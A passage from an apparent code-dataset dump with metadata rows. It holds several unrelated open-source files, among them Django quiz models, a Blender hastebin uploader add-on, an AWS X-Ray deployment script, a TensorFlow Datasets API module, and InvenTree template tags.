def get_delete_url(self):
return reverse('tag_delete', kwargs={'slug': self.slug})
def get_parent_url(self):
return reverse('tag_list')
class Quiz(ImageResizeUploadS3, CustomModel, models.Model):
name = models.CharField(max_length=63, db_index=True)
slug = models.SlugField(max_length=63, unique=True, help_text='A label for URL config')
description = models.TextField()
pub_date = models.DateField('date published', auto_now_add=True)
tags = models.ManyToManyField(Tag, blank=True)
author = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL, null=True) # If user deleted, posts are not deleted
image = models.ImageField(null=True, blank=True, default=None, upload_to='quiz_headers')
# Maximum size of image allowed without resizing (in pixels)
max_image_size = (800, 800)
class Meta:
ordering = ['name']
get_latest_by = 'pub_date'
verbose_name_plural = 'Quizzes'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('quiz_update', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('quiz_delete', kwargs={'slug': self.slug})
def get_start_url(self):
return reverse('quiz_start', kwargs={'slug': self.slug})
def create_question_url(self):
return reverse('quiz_question_create', kwargs={'quiz_slug': self.slug})
class Question(CustomModel, models.Model):
question_text = models.CharField(max_length=200)
correct_choice = models.CharField(max_length=63)
incorrect_choice_1 = models.CharField(max_length=63)
incorrect_choice_2 = models.CharField(max_length=63)
incorrect_choice_3 = models.CharField(max_length=63)
quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
class Meta:
unique_together = ('question_text', 'quiz') # The same quiz can't have the same questions
def __str__(self):
return self.question_text
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.quiz.slug})
def get_update_url(self):
return reverse('quiz_question_update', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_delete_url(self):
return reverse('quiz_question_delete', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_random_choices(self):
choice_list = [self.correct_choice,
self.incorrect_choice_1,
self.incorrect_choice_2,
self.incorrect_choice_3]
shuffle(choice_list)
return choice_list
| 34.201923
| 111
| 0.681473
|
from random import shuffle
from django.db import models
from django.shortcuts import reverse
from django.conf import settings
from core.utils import ImageResizeUploadS3
class CustomModel:
def get_model(self):
return self.__class__.__name__
class Tag(CustomModel, models.Model):
name = models.CharField(max_length=31, unique=True)
slug = models.SlugField(max_length=31, unique=True, help_text='A label for URL config')
class Meta:
ordering = ['name']
def __str__(self):
return self.name.title()
def get_absolute_url(self):
return reverse('tag_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('tag_update', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('tag_delete', kwargs={'slug': self.slug})
def get_parent_url(self):
return reverse('tag_list')
class Quiz(ImageResizeUploadS3, CustomModel, models.Model):
name = models.CharField(max_length=63, db_index=True)
slug = models.SlugField(max_length=63, unique=True, help_text='A label for URL config')
description = models.TextField()
pub_date = models.DateField('date published', auto_now_add=True)
tags = models.ManyToManyField(Tag, blank=True)
author = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL, null=True)
image = models.ImageField(null=True, blank=True, default=None, upload_to='quiz_headers')
max_image_size = (800, 800)
class Meta:
ordering = ['name']
get_latest_by = 'pub_date'
verbose_name_plural = 'Quizzes'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('quiz_update', kwargs={'slug': self.slug})
def get_delete_url(self):
return reverse('quiz_delete', kwargs={'slug': self.slug})
def get_start_url(self):
return reverse('quiz_start', kwargs={'slug': self.slug})
def create_question_url(self):
return reverse('quiz_question_create', kwargs={'quiz_slug': self.slug})
class Question(CustomModel, models.Model):
question_text = models.CharField(max_length=200)
correct_choice = models.CharField(max_length=63)
incorrect_choice_1 = models.CharField(max_length=63)
incorrect_choice_2 = models.CharField(max_length=63)
incorrect_choice_3 = models.CharField(max_length=63)
quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
class Meta:
unique_together = ('question_text', 'quiz')
def __str__(self):
return self.question_text
def get_absolute_url(self):
return reverse('quiz_detail', kwargs={'slug': self.quiz.slug})
def get_update_url(self):
return reverse('quiz_question_update', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_delete_url(self):
return reverse('quiz_question_delete', kwargs={'quiz_slug': self.quiz.slug, 'pk': self.pk})
def get_random_choices(self):
choice_list = [self.correct_choice,
self.incorrect_choice_1,
self.incorrect_choice_2,
self.incorrect_choice_3]
shuffle(choice_list)
return choice_list
| true
| true
|
1c40d837af0d413b7a0f8ca344d09150e56e4904
| 1,007
|
py
|
Python
|
PerformanceMetricsScript/ApplicationLevelPerformanceMetricsParsing.py
|
ShivKushwah/PSec-Anonymous
|
6561e8e753455731fc5a3ae80bc1007982131880
|
[
"MIT"
] | 4
|
2020-04-28T03:35:15.000Z
|
2021-12-08T08:19:52.000Z
|
PerformanceMetricsScript/ApplicationLevelPerformanceMetricsParsing.py
|
ShivKushwah/PSec
|
22b1c066ac0c2667713ce5f6c40f23406ce782f5
|
[
"MIT"
] | 1
|
2019-09-15T19:42:14.000Z
|
2019-09-15T19:42:14.000Z
|
PerformanceMetricsScript/ApplicationLevelPerformanceMetricsParsing.py
|
ShivKushwah/PSec
|
22b1c066ac0c2667713ce5f6c40f23406ce782f5
|
[
"MIT"
] | null | null | null |
import re
import subprocess
import time
import json
import statistics
import time
import os
import sys
search_lst1 = ['MEASURE BASELINE START']
search_lst2 = ['MEASURE BASELINE END']
id_lst = ['MEASURE BASELINE']
with open('BaselineCacheHost1.txt') as json_file:
data1 = json.load(json_file)
with open('BaselineCacheHost2.txt') as json_file:
data2 = json.load(json_file)
#merge 2 dictionaries into 1
data1.update(data2)
data_dict = {}
#Populate data_dict
for i in range(len(search_lst1)):
lst1 = data1[search_lst1[i]]
lst2 = data1[search_lst2[i]]
data_dict[id_lst[i]] = [end - start for end, start in zip(lst2, lst1)]
with open('BaselineCacheFinalResults.txt', 'w') as file:
file.write(json.dumps(data_dict)) # use `json.loads` to do the reverse
for key in data_dict.keys():
lst = data_dict[key]
print(key)
print('Mean:')
print(float(sum(lst))/len(lst))
print('Standard Deviation:')
res = statistics.pstdev(lst)
print(res)
print(data_dict)
| 23.418605
| 78
| 0.704071
|
import re
import subprocess
import time
import json
import statistics
import time
import os
import sys
search_lst1 = ['MEASURE BASELINE START']
search_lst2 = ['MEASURE BASELINE END']
id_lst = ['MEASURE BASELINE']
with open('BaselineCacheHost1.txt') as json_file:
data1 = json.load(json_file)
with open('BaselineCacheHost2.txt') as json_file:
data2 = json.load(json_file)
data1.update(data2)
data_dict = {}
for i in range(len(search_lst1)):
lst1 = data1[search_lst1[i]]
lst2 = data1[search_lst2[i]]
data_dict[id_lst[i]] = [end - start for end, start in zip(lst2, lst1)]
with open('BaselineCacheFinalResults.txt', 'w') as file:
file.write(json.dumps(data_dict))
for key in data_dict.keys():
lst = data_dict[key]
print(key)
print('Mean:')
print(float(sum(lst))/len(lst))
print('Standard Deviation:')
res = statistics.pstdev(lst)
print(res)
print(data_dict)
| true
| true
|
1c40d8498f142620bf4e4ba3383c78937ded2868
| 5,514
|
py
|
Python
|
bpy_lambda/2.78/scripts/addons_contrib/text_editor_hastebin.py
|
resultant-gamedev/bpy_lambda
|
c8cf46c10c69e74a0892b621d76c62edaa5b04bc
|
[
"MIT"
] | null | null | null |
bpy_lambda/2.78/scripts/addons_contrib/text_editor_hastebin.py
|
resultant-gamedev/bpy_lambda
|
c8cf46c10c69e74a0892b621d76c62edaa5b04bc
|
[
"MIT"
] | null | null | null |
bpy_lambda/2.78/scripts/addons_contrib/text_editor_hastebin.py
|
resultant-gamedev/bpy_lambda
|
c8cf46c10c69e74a0892b621d76c62edaa5b04bc
|
[
"MIT"
] | 1
|
2019-11-24T18:43:42.000Z
|
2019-11-24T18:43:42.000Z
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "hastebin",
"author": "Dalai Felinto (dfelinto)",
"version": (0, 8),
"blender": (2, 78, 0),
"location": "Text editor > Properties panel",
"description": "Send your selection or text to hastebin.com",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Text_Editor/hastebin",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Text Editor"}
import bpy
class TEXT_PT_hastebin(bpy.types.Panel):
bl_space_type = 'TEXT_EDITOR'
bl_region_type = 'UI'
bl_label = "hastebin.com"
def draw(self, context):
layout = self.layout
layout.operator("text.hastebin", icon='URL')
layout.prop(context.scene, "use_webbrowser")
class TEXT_OT_hastebin(bpy.types.Operator):
""""""
bl_idname = "text.hastebin"
bl_label = "hastebin.com"
bl_description = "Send the current text or selection to http://hastebin.com"
@classmethod
def poll(cls, context):
if context.area.type != 'TEXT_EDITOR':
return False
else:
return context.space_data.text != None
def invoke(self, context, event):
import webbrowser
st = context.space_data
# get the selected text
text = self.get_selected_text(st.text)
# if no text is selected send the whole file
if text is None: text = st.text.as_string()
# send the text and receive the returned page
page = self.send_text(text)
if page is None:
return {'CANCELLED'}
# store the link in the clipboard
bpy.context.window_manager.clipboard = page
if context.scene.use_webbrowser:
try:
webbrowser.open_new_tab(page)
except:
self.report({'WARNING'}, "Error in opening the page %s." % (page))
return {'FINISHED'}
def send_text(self, text):
""""""
import requests
base_url = "https://hastebin.com"
try:
response = requests.post(base_url + "/documents", text)
final_url = "%s/%s" % (base_url, response.json()['key'])
except requests.exceptions.SSLError:
self.report({'ERROR'}, "Error with SSL authorization, requires a more recent Blender")
return None
except:
self.report({'ERROR'}, "Error in sending the text to the server.")
return None
else:
return final_url
def get_selected_text(self, text):
""""""
current_line = text.current_line
select_end_line = text.select_end_line
current_character = text.current_character
select_end_character = text.select_end_character
# if there is no selected text return None
if current_line == select_end_line:
if current_character == select_end_character:
return None
else:
return current_line.body[min(current_character,select_end_character):max(current_character,select_end_character)]
text_return = None
writing = False
normal_order = True # selection from top to bottom
for line in text.lines:
if not writing:
if line == current_line:
text_return = current_line.body[current_character:] + "\n"
writing = True
continue
elif line == select_end_line:
text_return = select_end_line.body[select_end_character:] + "\n"
writing = True
normal_order = False
continue
else:
if normal_order:
if line == select_end_line:
text_return += select_end_line.body[:select_end_character]
break
else:
text_return += line.body + "\n"
continue
else:
if line == current_line:
text_return += current_line.body[:current_character]
break
else:
text_return += line.body + "\n"
continue
return text_return
def register():
bpy.types.Scene.use_webbrowser = bpy.props.BoolProperty(
name='Launch Browser',
description='Opens the page with the submitted text',
default=True)
bpy.utils.register_module(__name__)
def unregister():
del bpy.types.Scene.use_webbrowser
bpy.utils.unregister_module(__name__)
if __name__ == "__main__":
register()
| 32.627219
| 129
| 0.593399
|
Text_Editor/hastebin",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Text Editor"}
import bpy
class TEXT_PT_hastebin(bpy.types.Panel):
bl_space_type = 'TEXT_EDITOR'
bl_region_type = 'UI'
bl_label = "hastebin.com"
def draw(self, context):
layout = self.layout
layout.operator("text.hastebin", icon='URL')
layout.prop(context.scene, "use_webbrowser")
class TEXT_OT_hastebin(bpy.types.Operator):
bl_idname = "text.hastebin"
bl_label = "hastebin.com"
bl_description = "Send the current text or selection to http://hastebin.com"
@classmethod
def poll(cls, context):
if context.area.type != 'TEXT_EDITOR':
return False
else:
return context.space_data.text != None
def invoke(self, context, event):
import webbrowser
st = context.space_data
text = self.get_selected_text(st.text)
if text is None: text = st.text.as_string()
page = self.send_text(text)
if page is None:
return {'CANCELLED'}
bpy.context.window_manager.clipboard = page
if context.scene.use_webbrowser:
try:
webbrowser.open_new_tab(page)
except:
self.report({'WARNING'}, "Error in opening the page %s." % (page))
return {'FINISHED'}
def send_text(self, text):
import requests
base_url = "https://hastebin.com"
try:
response = requests.post(base_url + "/documents", text)
final_url = "%s/%s" % (base_url, response.json()['key'])
except requests.exceptions.SSLError:
self.report({'ERROR'}, "Error with SSL authorization, requires a more recent Blender")
return None
except:
self.report({'ERROR'}, "Error in sending the text to the server.")
return None
else:
return final_url
def get_selected_text(self, text):
current_line = text.current_line
select_end_line = text.select_end_line
current_character = text.current_character
select_end_character = text.select_end_character
if current_line == select_end_line:
if current_character == select_end_character:
return None
else:
return current_line.body[min(current_character,select_end_character):max(current_character,select_end_character)]
text_return = None
writing = False
normal_order = True
for line in text.lines:
if not writing:
if line == current_line:
text_return = current_line.body[current_character:] + "\n"
writing = True
continue
elif line == select_end_line:
text_return = select_end_line.body[select_end_character:] + "\n"
writing = True
normal_order = False
continue
else:
if normal_order:
if line == select_end_line:
text_return += select_end_line.body[:select_end_character]
break
else:
text_return += line.body + "\n"
continue
else:
if line == current_line:
text_return += current_line.body[:current_character]
break
else:
text_return += line.body + "\n"
continue
return text_return
def register():
bpy.types.Scene.use_webbrowser = bpy.props.BoolProperty(
name='Launch Browser',
description='Opens the page with the submitted text',
default=True)
bpy.utils.register_module(__name__)
def unregister():
del bpy.types.Scene.use_webbrowser
bpy.utils.unregister_module(__name__)
if __name__ == "__main__":
register()
| true
| true
|
1c40d8c2ee70c98476b025510a63d8e9b4910304
| 3,606
|
py
|
Python
|
Setup/install.py
|
SyedRizvi-TomTom/aws-xray-cloudwatch-event
|
90e8b1e71d801f3dd59ba25ee880ae0f9f581cdf
|
[
"Apache-2.0"
] | null | null | null |
Setup/install.py
|
SyedRizvi-TomTom/aws-xray-cloudwatch-event
|
90e8b1e71d801f3dd59ba25ee880ae0f9f581cdf
|
[
"Apache-2.0"
] | null | null | null |
Setup/install.py
|
SyedRizvi-TomTom/aws-xray-cloudwatch-event
|
90e8b1e71d801f3dd59ba25ee880ae0f9f581cdf
|
[
"Apache-2.0"
] | null | null | null |
'''
/*Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License").
You may not use this file except in compliance with the License.
A copy of the License is located at http://aws.amazon.com/apache2.0/ or in the "license" file accompanying this file.
This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.*/
'''
import os
import json
appname = raw_input("Enter a unique name for your app {pattern:^[a-z0-9]+$}:")
print("Your appname:"+appname+" will be used for naming your CloudFormation stack, public s3 bucket and as a prefix as a prefix to identify all the Lambda functions and IAM Roles associated with your app")
print("The region should be the same as your service running in X-Ray. If your service runs in multiple regions then you should have multiple instances of this sample app running in each region.")
sampleappregion = raw_input("Enter the aws region where you would like this sample app to be deployed. (Default: us-west-2): ") or "us-west-2"
# Setting time to analyze servicemap. Default set to 6 hours if not found in xraycloudwatcheventfile.json.
xraycloudwatcheventfile = open('xraycloudwatchevent.json', 'r').read()
xraycloudwatcheventdict = json.loads(xraycloudwatcheventfile)
analyzeservicemapminutes = xraycloudwatcheventdict['analyzeservicemapminutes'] if 'analyzeservicemapminutes' in xraycloudwatcheventdict else 360
evaluationperiodforcwalarm = xraycloudwatcheventdict['evaluationperiodforcwalarm'] if 'evaluationperiodforcwalarm' in xraycloudwatcheventdict else 1
print("Setting to analyze your service map every: %d minutes" % analyzeservicemapminutes)
# Zip the Lambda function and node folders
print("Zipping the file that has to be uploaded to AWS Lambda")
zipcommand = "zip -q -r Archive.zip xraycloudwatchevent.py"
os.system(zipcommand)
# Create s3 bucket to store the Archive
print("Creating S3 bucket that will have the Archive.zip file for AWS Lambda")
s3createcommand = "aws s3api create-bucket --create-bucket-configuration LocationConstraint=%s --acl private --bucket lambdacodexcw" % sampleappregion
os.system(s3createcommand)
# Upload Archive.zip to s3 bucket
print("Uploading Archive.zip to the S3 bucket")
s3uploadcommand = "aws s3 cp Archive.zip s3://lambdacodexcw"
os.system(s3uploadcommand)
# Deploy resources in a CloudFormation stack
periodcwalarm=analyzeservicemapminutes*60 # Converting analyzeservicemapminutes from minutes to seconds
print("Deploying resources from the Cloudformation template")
cfcommand = "aws --region %s cloudformation deploy --template-file xraycloudwatchevent.template --stack-name %s --parameter-overrides appname=%s analyzeservicemapminutes=%d periodcwalarm=%d evaluationperiodforcwalarm=%d --capabilities CAPABILITY_NAMED_IAM" % (sampleappregion, appname, appname, analyzeservicemapminutes,periodcwalarm,evaluationperiodforcwalarm)
print(cfcommand)
os.system(cfcommand)
print("Completed deploying resources from the Cloudformation template.")
# Upload xraycloudwatchevent.json to s3 bucket
print("Uploading xraycloudwatchevent.json to the S3 bucket")
s3uploadcommand = "aws s3 cp xraycloudwatchevent.json s3://"+appname+"-xraycloudwatcheventbucket"
os.system(s3uploadcommand)
# Delete bucket that has the lambda code
deletes3lambdabucket = "aws s3 rb s3://lambdacodexcw --force"
os.system(deletes3lambdabucket)
print("Deleted temporary s3 bucket")
print("-All set-")
| 54.636364
| 361
| 0.801997
|
import os
import json
appname = raw_input("Enter a unique name for your app {pattern:^[a-z0-9]+$}:")
print("Your appname:"+appname+" will be used for naming your CloudFormation stack, public s3 bucket and as a prefix as a prefix to identify all the Lambda functions and IAM Roles associated with your app")
print("The region should be the same as your service running in X-Ray. If your service runs in multiple regions then you should have multiple instances of this sample app running in each region.")
sampleappregion = raw_input("Enter the aws region where you would like this sample app to be deployed. (Default: us-west-2): ") or "us-west-2"
xraycloudwatcheventfile = open('xraycloudwatchevent.json', 'r').read()
xraycloudwatcheventdict = json.loads(xraycloudwatcheventfile)
analyzeservicemapminutes = xraycloudwatcheventdict['analyzeservicemapminutes'] if 'analyzeservicemapminutes' in xraycloudwatcheventdict else 360
evaluationperiodforcwalarm = xraycloudwatcheventdict['evaluationperiodforcwalarm'] if 'evaluationperiodforcwalarm' in xraycloudwatcheventdict else 1
print("Setting to analyze your service map every: %d minutes" % analyzeservicemapminutes)
print("Zipping the file that has to be uploaded to AWS Lambda")
zipcommand = "zip -q -r Archive.zip xraycloudwatchevent.py"
os.system(zipcommand)
print("Creating S3 bucket that will have the Archive.zip file for AWS Lambda")
s3createcommand = "aws s3api create-bucket --create-bucket-configuration LocationConstraint=%s --acl private --bucket lambdacodexcw" % sampleappregion
os.system(s3createcommand)
print("Uploading Archive.zip to the S3 bucket")
s3uploadcommand = "aws s3 cp Archive.zip s3://lambdacodexcw"
os.system(s3uploadcommand)
periodcwalarm=analyzeservicemapminutes*60
print("Deploying resources from the Cloudformation template")
cfcommand = "aws --region %s cloudformation deploy --template-file xraycloudwatchevent.template --stack-name %s --parameter-overrides appname=%s analyzeservicemapminutes=%d periodcwalarm=%d evaluationperiodforcwalarm=%d --capabilities CAPABILITY_NAMED_IAM" % (sampleappregion, appname, appname, analyzeservicemapminutes,periodcwalarm,evaluationperiodforcwalarm)
print(cfcommand)
os.system(cfcommand)
print("Completed deploying resources from the Cloudformation template.")
print("Uploading xraycloudwatchevent.json to the S3 bucket")
s3uploadcommand = "aws s3 cp xraycloudwatchevent.json s3://"+appname+"-xraycloudwatcheventbucket"
os.system(s3uploadcommand)
deletes3lambdabucket = "aws s3 rb s3://lambdacodexcw --force"
os.system(deletes3lambdabucket)
print("Deleted temporary s3 bucket")
print("-All set-")
| true
| true
|
1c40da02d769adb5740c546f1fd8aa5897d22286
| 3,044
|
py
|
Python
|
tensorflow_datasets/public_api.py
|
mdautrey/datasets
|
5ad83a418d3505619c4282d2b3ff7a80edc45469
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/public_api.py
|
mdautrey/datasets
|
5ad83a418d3505619c4282d2b3ff7a80edc45469
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/public_api.py
|
mdautrey/datasets
|
5ad83a418d3505619c4282d2b3ff7a80edc45469
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Public API of tfds, without the registered dataset."""
# pylint: disable=unused-import,g-import-not-at-top,g-bad-import-order,wrong-import-position
from tensorflow_datasets.core import tf_compat
tf_compat.ensure_tf_install()
from tensorflow_datasets import core
from tensorflow_datasets.core import folder_dataset
from tensorflow_datasets.core import download
from tensorflow_datasets.core import decode
from tensorflow_datasets.core import deprecated
from tensorflow_datasets.core import features
from tensorflow_datasets.core import units
from tensorflow_datasets.core import visualization
from tensorflow_datasets.core.as_dataframe import as_dataframe
from tensorflow_datasets.core.folder_dataset import ImageFolder
from tensorflow_datasets.core.folder_dataset import TranslateFolder
from tensorflow_datasets.core.dataset_utils import as_numpy
from tensorflow_datasets.core.download import GenerateMode
from tensorflow_datasets.core.load import builder
from tensorflow_datasets.core.load import builder_cls
from tensorflow_datasets.core.load import list_builders
from tensorflow_datasets.core.load import load
from tensorflow_datasets.core.splits import even_splits
from tensorflow_datasets.core.splits import Split
from tensorflow_datasets.core.utils import type_utils as typing
from tensorflow_datasets.core.utils.gcs_utils import is_dataset_on_gcs
from tensorflow_datasets.core.utils.read_config import ReadConfig
from tensorflow_datasets.core.utils.tqdm_utils import disable_progress_bar
from tensorflow_datasets.core.visualization import show_examples
from tensorflow_datasets.core.visualization import show_statistics
from tensorflow_datasets.version import __version__
deprecated = core.utils.docs.deprecated(deprecated)
with core.registered.skip_registration():
# We import testing namespace but without registering the tests datasets
# (e.g. DummyMnist,...).
from tensorflow_datasets import testing
__all__ = [
"as_dataframe",
"as_numpy",
"core",
"deprecated",
"folder_dataset",
"builder",
"builder_cls",
"decode",
"disable_progress_bar",
"download",
"even_splits",
"features",
"GenerateMode",
"ImageFolder",
"is_dataset_on_gcs",
"list_builders",
"load",
"ReadConfig",
"Split",
"show_examples",
"show_statistics",
"testing",
"TranslateFolder",
"typing",
"units",
"visualization",
"__version__",
]
| 35.395349
| 92
| 0.796321
|
from tensorflow_datasets.core import tf_compat
tf_compat.ensure_tf_install()
from tensorflow_datasets import core
from tensorflow_datasets.core import folder_dataset
from tensorflow_datasets.core import download
from tensorflow_datasets.core import decode
from tensorflow_datasets.core import deprecated
from tensorflow_datasets.core import features
from tensorflow_datasets.core import units
from tensorflow_datasets.core import visualization
from tensorflow_datasets.core.as_dataframe import as_dataframe
from tensorflow_datasets.core.folder_dataset import ImageFolder
from tensorflow_datasets.core.folder_dataset import TranslateFolder
from tensorflow_datasets.core.dataset_utils import as_numpy
from tensorflow_datasets.core.download import GenerateMode
from tensorflow_datasets.core.load import builder
from tensorflow_datasets.core.load import builder_cls
from tensorflow_datasets.core.load import list_builders
from tensorflow_datasets.core.load import load
from tensorflow_datasets.core.splits import even_splits
from tensorflow_datasets.core.splits import Split
from tensorflow_datasets.core.utils import type_utils as typing
from tensorflow_datasets.core.utils.gcs_utils import is_dataset_on_gcs
from tensorflow_datasets.core.utils.read_config import ReadConfig
from tensorflow_datasets.core.utils.tqdm_utils import disable_progress_bar
from tensorflow_datasets.core.visualization import show_examples
from tensorflow_datasets.core.visualization import show_statistics
from tensorflow_datasets.version import __version__
deprecated = core.utils.docs.deprecated(deprecated)
with core.registered.skip_registration():
from tensorflow_datasets import testing
__all__ = [
"as_dataframe",
"as_numpy",
"core",
"deprecated",
"folder_dataset",
"builder",
"builder_cls",
"decode",
"disable_progress_bar",
"download",
"even_splits",
"features",
"GenerateMode",
"ImageFolder",
"is_dataset_on_gcs",
"list_builders",
"load",
"ReadConfig",
"Split",
"show_examples",
"show_statistics",
"testing",
"TranslateFolder",
"typing",
"units",
"visualization",
"__version__",
]
| true
| true
|
1c40dad565424aa804e988e7f0c48edb8069d843
| 455
|
py
|
Python
|
tests/list1.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 31
|
2022-01-07T23:56:33.000Z
|
2022-03-29T16:09:02.000Z
|
tests/list1.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 197
|
2021-12-29T19:01:41.000Z
|
2022-03-31T15:58:25.000Z
|
tests/list1.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 17
|
2022-01-06T15:34:36.000Z
|
2022-03-31T13:55:33.000Z
|
def test_List():
a: list[i32]
a = [1, 2, 3]
a = [-3, -2, -1]
# a = [-2, -1, 0.45] -> semantic error
b: list[str]
b = ["a", "b", "c"]
c: list[list[i32]]
c = [[1, 2, 3], [4, 5, 6]]
d: i32
d = a[2]
# ragged list
e: list[list[str]]
e = [['a', 'b', 'c'], ['d', 'e']]
a.append(10)
a.remove(1)
a.insert(2, 13)
a = a[0:2]
d = a.pop()
d = a.pop(2)
a += [4, 5]
a = [6, 7] + a
| 16.25
| 42
| 0.356044
|
def test_List():
a: list[i32]
a = [1, 2, 3]
a = [-3, -2, -1]
b: list[str]
b = ["a", "b", "c"]
c: list[list[i32]]
c = [[1, 2, 3], [4, 5, 6]]
d: i32
d = a[2]
e: list[list[str]]
e = [['a', 'b', 'c'], ['d', 'e']]
a.append(10)
a.remove(1)
a.insert(2, 13)
a = a[0:2]
d = a.pop()
d = a.pop(2)
a += [4, 5]
a = [6, 7] + a
| true
| true
|
1c40dae30ee101fc406cd20627c4cdfdd63c602f
| 7,174
|
py
|
Python
|
InvenTree/part/templatetags/inventree_extras.py
|
TheCrazyMaffin/InvenTree
|
2686f61a4ac279386a83049745339345f1ac4cf7
|
[
"MIT"
] | null | null | null |
InvenTree/part/templatetags/inventree_extras.py
|
TheCrazyMaffin/InvenTree
|
2686f61a4ac279386a83049745339345f1ac4cf7
|
[
"MIT"
] | null | null | null |
InvenTree/part/templatetags/inventree_extras.py
|
TheCrazyMaffin/InvenTree
|
2686f61a4ac279386a83049745339345f1ac4cf7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""" This module provides template tags for extra functionality
over and above the built-in Django tags.
"""
import os
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as djangosettings
from django import template
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.templatetags.static import StaticNode
from InvenTree import version, settings
import InvenTree.helpers
from common.models import InvenTreeSetting, ColorTheme
from common.settings import currency_code_default
register = template.Library()
@register.simple_tag()
def define(value, *args, **kwargs):
"""
Shortcut function to overcome the shortcomings of the django templating language
Use as follows: {% define "hello_world" as hello %}
Ref: https://stackoverflow.com/questions/1070398/how-to-set-a-value-of-a-variable-inside-a-template-code
"""
return value
@register.simple_tag()
def decimal(x, *args, **kwargs):
""" Simplified rendering of a decimal number """
return InvenTree.helpers.decimal2string(x)
@register.simple_tag()
def str2bool(x, *args, **kwargs):
""" Convert a string to a boolean value """
return InvenTree.helpers.str2bool(x)
@register.simple_tag()
def inrange(n, *args, **kwargs):
""" Return range(n) for iterating through a numeric quantity """
return range(n)
@register.simple_tag()
def multiply(x, y, *args, **kwargs):
""" Multiply two numbers together """
return InvenTree.helpers.decimal2string(x * y)
@register.simple_tag()
def add(x, y, *args, **kwargs):
""" Add two numbers together """
return x + y
@register.simple_tag()
def part_allocation_count(build, part, *args, **kwargs):
""" Return the total number of <part> allocated to <build> """
return InvenTree.helpers.decimal2string(build.getAllocatedQuantity(part))
@register.simple_tag()
def inventree_in_debug_mode(*args, **kwargs):
""" Return True if the server is running in DEBUG mode """
return djangosettings.DEBUG
@register.simple_tag()
def inventree_docker_mode(*args, **kwargs):
""" Return True if the server is running as a Docker image """
return djangosettings.DOCKER
@register.simple_tag()
def inventree_db_engine(*args, **kwargs):
""" Return the InvenTree database backend e.g. 'postgresql' """
db = djangosettings.DATABASES['default']
engine = db.get('ENGINE', _('Unknown database'))
engine = engine.replace('django.db.backends.', '')
return engine
@register.simple_tag()
def inventree_instance_name(*args, **kwargs):
""" Return the InstanceName associated with the current database """
return version.inventreeInstanceName()
@register.simple_tag()
def inventree_title(*args, **kwargs):
""" Return the title for the current instance - respecting the settings """
return version.inventreeInstanceTitle()
@register.simple_tag()
def inventree_version(*args, **kwargs):
""" Return InvenTree version string """
return version.inventreeVersion()
@register.simple_tag()
def inventree_api_version(*args, **kwargs):
""" Return InvenTree API version """
return version.inventreeApiVersion()
@register.simple_tag()
def django_version(*args, **kwargs):
""" Return Django version string """
return version.inventreeDjangoVersion()
@register.simple_tag()
def inventree_commit_hash(*args, **kwargs):
""" Return InvenTree git commit hash string """
return version.inventreeCommitHash()
@register.simple_tag()
def inventree_commit_date(*args, **kwargs):
""" Return InvenTree git commit date string """
return version.inventreeCommitDate()
@register.simple_tag()
def inventree_github_url(*args, **kwargs):
""" Return URL for InvenTree github site """
return "https://github.com/InvenTree/InvenTree/"
@register.simple_tag()
def inventree_docs_url(*args, **kwargs):
""" Return URL for InvenTree documenation site """
return "https://inventree.readthedocs.io/"
@register.simple_tag()
def inventree_credits_url(*args, **kwargs):
""" Return URL for InvenTree credits site """
return "https://inventree.readthedocs.io/en/latest/credits/"
@register.simple_tag()
def default_currency(*args, **kwargs):
""" Returns the default currency code """
return currency_code_default()
@register.simple_tag()
